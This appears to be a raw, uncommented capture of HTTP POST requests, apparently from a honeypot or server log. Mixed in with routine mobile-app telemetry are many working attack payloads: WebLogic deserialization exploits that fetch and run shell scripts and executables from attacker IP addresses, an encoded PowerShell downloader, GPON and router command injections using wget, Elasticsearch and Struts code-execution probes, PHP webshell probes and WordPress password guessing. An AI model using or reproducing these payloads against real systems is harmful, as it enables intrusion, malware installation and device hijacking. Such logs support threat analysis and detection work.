Al+ymSVHU1KsZ5HDe6ahJJNw2iFn181ZAQwoU0S4XT1dyIbedDQLgfILFTWVSk9en7JmbTFbdRtYQxiOSCIOp37N+MXKAlNgRZXMqvHo41KxgqiSbYRKWC+v2mdprCVZwRlQyuBOBnR4OsWnLQDT9DacmKOww5uGWJ9BO3n1xqa95tUOI2fXtos+HzNqpS43OD9/4XFbi7y90v/qq4Iys8YS3XwCw/ZN/RPzvghH3IVxV9ZFmQ+dguJMSu/xcT3ECehJl7lFN7ZBDQQgyLJdN9fA/1h3nm35I5JxKm4BCGNzjbsCn7CyC0SBqr5EiPg8vWC1y0pKLgnSrsWzmgdQAW/hOXTK8ZAIkb+TcDU3Po5MoPbeH8/x8YIumHr3AIaeQrJWh0NeqssWy8yfmNV5cxORbN4sLWB0WfdV6PxVpZAchZI9MPETFaPc

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1037
Content-Type: multipart/form-data; boundary=-sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

871828
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

db46af11c5de78e66ad849eb717c1caf
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe--


POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache

log=172&pwd=test123

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
content-type: text/xml
Content-Length: 1217

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>powershell -Command &quot;$r = [System.Net.WebRequest]::Create(&apos;http://91.213.8.66/qwerty&apos;); $resp = $r.GetResponse();&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

169834
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

81f4116c461992cc961e363809ac31b0
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg--


POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

m=die((string)(111111111*9))

POST /login.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: x.x.x.x:8080
Content-Length: 553
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂”â
Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache

log=admin&pwd=p@ssword

POST /command.php HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 208

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195



POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1061
Content-Type: multipart/form-data; boundary=7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

231045
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

da8918855b53ef2d02eee21e87544ffc
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A---


POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /hndUnblock.cgi HTTP/1.1
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1039
Content-Type: multipart/form-data; boundary=MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

695441
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

ee2fc573c4b18a2598eee301dc4602ca
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO--


POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23



POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive



POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂”â
Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
¸√ßÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 396
Cache-Control: no-cache

RqENx9qaN2BLzfs8AEsRnq7AJiAufdaP+4+Ce/tdtC4PxwsI3StHT0gna4TO23z+aI/usg0FGMXsUinDQ9PemqpeT4cJ6SBExPImjzmlVhAtGYL7pAQ2lTQE0LAc3o8xOt61YZ5A7RAwgxCLdLfjW+lCbS+WRmciKpg+i/0zCN3PN/BjjwTwiqOJpm49UwA3fJm309N2p6MjK0Ud9VUmP+kHNEZ6umgZENG4FINxbPG6h5By2aCsECII+N2fNHl+qHsfbLGJPLIQccVWQ1u1H8funjFloXxsQYP7GkVyfGIS3NNuQ+Tl8jINkNYNO4RX9He36tsiFa0iOgORKYY1jiPSm7qv/i4WrO6K+vt5uX4ZrStKcVzCvKFFNsMI7BwHiaZ4zZyaKg==

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

630808
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

8246cb21e7558e2a42d1608c891222e8
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MASBJS; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache

VFvkzH0XVWT5pXVD6ncKlyvowiMTsltrhTFiYo39pjtKNqkbvi62pXeze3SBIExIAFWQSrffAHvfaXV4jKWPaecEGSYkxAqUF/UEr69h6FWjsE1Yb4u2qej+yRF7EigHefe1tI5yXQH9pVMnbZM9Vy2Dgo4ELwdv7N6uUEcPITjPwqtugk+CGOirhwd6nOOiI4SIqJ1/JC9eercSl76MuVvIEXYDIsV00B32FqJy3T5O3OvVzeCNzdKrLUgQecLSKwjdZqFYpR9Qkm+V57zqP4ICBLuXfy+WL9eZ5WGnf4Jq69ZIxWZ2ATsZrtO1mpv7xl7nx3gpHTDd0cjkwgSquzu+AiBt2yVPzxq8+aZ7/rhB

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
